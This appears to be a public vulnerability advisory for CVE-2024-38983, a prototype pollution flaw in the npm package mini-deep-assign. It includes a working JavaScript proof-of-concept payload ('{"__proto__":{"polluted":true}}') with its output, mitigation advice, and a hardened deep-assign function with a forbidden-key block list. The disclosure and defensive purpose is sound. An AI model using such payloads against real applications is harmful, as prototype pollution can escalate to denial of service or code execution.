@mestrtee
Last active July 29, 2024 17:47
[CVE-2024-38983] Prototype Pollution Vulnerability Affecting mini-deep-assign, version 0.0.8

Overview

All versions of this module are potentially affected by prototype pollution. The vulnerability is located in Module.assign (/lib/index.js:91), where the _assign() method is used to recursively copy source properties to the destination. An attacker can exploit this method to copy a malicious property into the built-in Object.prototype through the special properties __proto__ or constructor.prototype. The attacker can thus use one of these properties to pollute the application logic, which can be escalated to denial of service, remote code execution or cross-site scripting attacks.

PoC

(async () => {
  const lib = await import('mini-deep-assign');

  // JSON.parse creates an own property literally named "__proto__",
  // which the recursive copy then treats like any other key.
  var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  var victim = {}; // never touched directly; only inherits from Object.prototype
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    lib.default({}, BAD_JSON);
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  delete Object.prototype.polluted; // clean up the shared prototype
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

How to prevent:

No updates were provided by the maintainer. Users of this module are urged to implement proper sanitization and validation of user-supplied inputs, such as blocking inputs containing __proto__ and constructor.prototype.
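As an added example of the mitigation described above (not the mini-deep-assign module's own code), the following hypothetical safeDeepAssign() refuses the keys that reach Object.prototype and only descends into own properties of the target. runPoc() replays the gist's PoC flow against it:

```javascript
// Keys that let a recursive copy escape into the shared prototype chain.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Only plain objects (or null-prototype objects) are merged recursively.
function isPlainObject(value) {
  if (value === null || typeof value !== 'object') return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

// Hypothetical hardened replacement for a deep assign: fails closed on
// forbidden keys instead of silently writing them.
function safeDeepAssign(target, ...sources) {
  for (const source of sources) {
    if (!isPlainObject(source)) continue;
    // Object.keys lists own enumerable keys, including a JSON-parsed "__proto__".
    for (const key of Object.keys(source)) {
      if (FORBIDDEN_KEYS.has(key)) {
        throw new Error(`safeDeepAssign: refusing to copy key "${key}"`);
      }
      const value = source[key];
      if (isPlainObject(value)) {
        // Descend only into a slot the target itself owns, never an inherited one.
        const own = Object.prototype.hasOwnProperty.call(target, key) ? target[key] : undefined;
        target[key] = safeDeepAssign(isPlainObject(own) ? own : {}, value);
      } else {
        target[key] = value;
      }
    }
  }
  return target;
}

// Replays the gist's PoC (constructed payload) and reports the prototype state.
function runPoc() {
  const badJson = JSON.parse('{"__proto__":{"polluted":true}}');
  const victim = {};
  const before = JSON.stringify(victim.__proto__);
  let rejected = false;
  try {
    safeDeepAssign({}, badJson);
  } catch (e) {
    rejected = true;
  }
  const after = JSON.stringify(victim.__proto__);
  return { before, after, rejected, polluted: 'polluted' in victim };
}
```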

References:
